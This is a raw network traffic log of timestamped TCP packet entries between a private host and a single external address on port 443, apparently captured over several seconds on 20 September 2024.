Sep 20, 2024 11:07:35.653670073 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.653683901 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.653728008 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.669385910 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.669415951 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.669502974 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.669517994 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.669569016 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.685164928 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.685201883 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.685302019 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.685318947 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.685329914 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.685362101 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.691900015 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.691926003 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.691997051 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.692008018 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.692047119 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.693258047 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.693278074 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.693351030 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.693358898 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.693392992 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.705540895 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.705564022 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.705636024 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.705647945 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.705688953 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.726567030 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.726591110 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.726690054 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.726700068 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.726737976 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.735928059 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.735950947 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.736007929 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.736017942 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.736041069 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.736057997 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.746068001 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.746094942 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.746167898 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.746177912 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.746195078 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.746221066 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.763825893 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.763835907 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.763905048 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.763917923 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.763936996 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.763957977 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.777868032 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.777894974 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.777941942 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.777955055 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.777971983 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.777988911 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.784651995 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.784672976 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.784744978 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.784755945 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.784789085 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.785936117 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.785955906 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.786001921 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.786010981 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.786036015 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.786051989 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.797866106 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.797893047 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.797966957 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.797976971 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.797997952 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.798011065 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.819070101 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.819101095 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.819186926 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.819201946 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.819245100 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.828561068 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.828586102 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.828691959 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.828701019 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.828746080 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.838921070 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.838973999 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.839010954 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.839020014 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.839066029 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.839066029 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.856337070 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.856374025 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.856618881 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.856641054 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.856692076 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.870316029 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.870345116 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.870409966 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.870420933 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.870448112 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.870472908 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.877322912 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.877356052 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.877408028 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.877417088 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.877453089 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.878379107 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.878402948 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.878457069 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.878463984 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.878504992 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.891303062 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.891330004 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.891370058 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.891379118 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.891408920 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.891424894 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.911820889 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.911885023 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.911902905 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.911912918 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.911942959 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.911953926 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.921338081 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.921396971 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.921418905 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.921427965 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.921452999 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.921473026 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.931581020 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.931623936 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.931660891 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.931668043 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.931699038 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.931706905 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.949043036 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.949088097 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.949126005 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.949135065 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.949167967 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.962707043 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.962727070 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.962790012 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.962804079 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.962843895 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.970822096 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.970843077 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.970911980 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.970921040 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.970959902 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.972528934 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.972548962 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.972609043 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.972618103 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.972654104 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.983999968 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.984020948 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.984072924 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.984086990 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.984098911 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.984121084 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:36.004235029 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:36.004256010 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:36.004313946 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:36.004323006 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:36.004360914 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:36.014055967 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:36.014081955 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:36.014170885 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:36.014178991 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:36.014242887 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:36.024138927 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:36.024168015 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:36.024266005 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:36.024279118 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:36.024315119 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:36.041533947 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:36.041558027 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:36.041604996 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:36.041606903 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:36.041621923 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:36.041651964 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:36.041671991 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:36.041676044 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:36.041691065 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:36.041717052 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:36.041728973 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:36.041987896 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:36.042009115 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:36.130393982 CEST	49745	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:36.130435944 CEST	443	49745	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:36.130506039 CEST	49745	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:36.130731106 CEST	49745	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:36.130742073 CEST	443	49745	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:36.790050030 CEST	443	49745	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:36.790169001 CEST	49745	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:36.790559053 CEST	49745	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:36.790569067 CEST	443	49745	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:36.792443037 CEST	49745	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:36.792448044 CEST	443	49745	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:36.792495012 CEST	49745	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:36.792501926 CEST	443	49745	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:37.625693083 CEST	443	49745	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:37.625792980 CEST	443	49745	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:37.625824928 CEST	49745	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:37.625859976 CEST	49745	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:37.626696110 CEST	49745	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:37.626720905 CEST	443	49745	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:37.649123907 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:37.649193048 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:37.649280071 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:37.649663925 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:37.649679899 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:38.297756910 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:38.297862053 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:38.298440933 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:38.298455000 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:38.301227093 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:38.301233053 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:38.301275969 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:38.301300049 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:38.651784897 CEST	49747	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:38.651839018 CEST	443	49747	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:38.651946068 CEST	49747	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:38.652283907 CEST	49747	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:38.652301073 CEST	443	49747	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:39.133392096 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:39.133462906 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:39.133555889 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:39.135663986 CEST	49746	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:39.135684013 CEST	443	49746	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:39.454912901 CEST	443	49747	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:39.454979897 CEST	49747	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:39.499732018 CEST	49747	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:39.499762058 CEST	443	49747	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:39.501666069 CEST	49747	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:39.501673937 CEST	443	49747	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:39.803180933 CEST	49748	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:39.803232908 CEST	443	49748	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:39.803298950 CEST	49748	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:39.803538084 CEST	49748	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:39.803555965 CEST	443	49748	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:40.328690052 CEST	443	49747	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:40.328744888 CEST	49747	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:40.328761101 CEST	443	49747	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:40.328809977 CEST	49747	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:40.328815937 CEST	443	49747	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:40.328826904 CEST	443	49747	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:40.328846931 CEST	49747	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:40.328864098 CEST	49747	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:40.329910040 CEST	49747	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:40.329924107 CEST	443	49747	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:40.560302019 CEST	443	49748	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:40.560393095 CEST	49748	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:40.560970068 CEST	49748	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:40.560982943 CEST	443	49748	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:40.564471006 CEST	49748	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:40.564485073 CEST	443	49748	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:40.822844982 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:40.822887897 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:40.822962046 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:40.823190928 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:40.823203087 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:41.434066057 CEST	443	49748	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:41.434200048 CEST	49748	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:41.434216976 CEST	443	49748	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:41.434273005 CEST	49748	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:41.435338020 CEST	49748	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:41.435369968 CEST	443	49748	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:41.501732111 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:41.501794100 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:41.545725107 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:41.545742989 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:41.547720909 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:41.547724962 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:41.943094015 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:41.943125010 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:41.943149090 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:41.943177938 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:41.943217039 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:41.943228960 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:41.943284035 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:41.974955082 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:41.975016117 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:41.975105047 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:41.975116014 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:41.975137949 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:41.975162029 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.043445110 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.043471098 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.043545961 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.043560028 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.043597937 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.082437992 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.082463980 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.082521915 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.082526922 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.082566977 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.115732908 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.115758896 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.115813971 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.115833044 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.115849972 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.115864992 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.141493082 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.141515970 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.141582966 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.141590118 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.141633987 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.165894032 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.165920019 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.166070938 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.166074991 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.166117907 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.180969954 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.180994034 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.181083918 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.181087971 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.181126118 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.199096918 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.199119091 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.199183941 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.199187994 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.199227095 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.216613054 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.216629028 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.216758013 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.216762066 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.216801882 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.231401920 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.231417894 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.231484890 CEST	49749	443	192.168.2.4	116.203.165.127
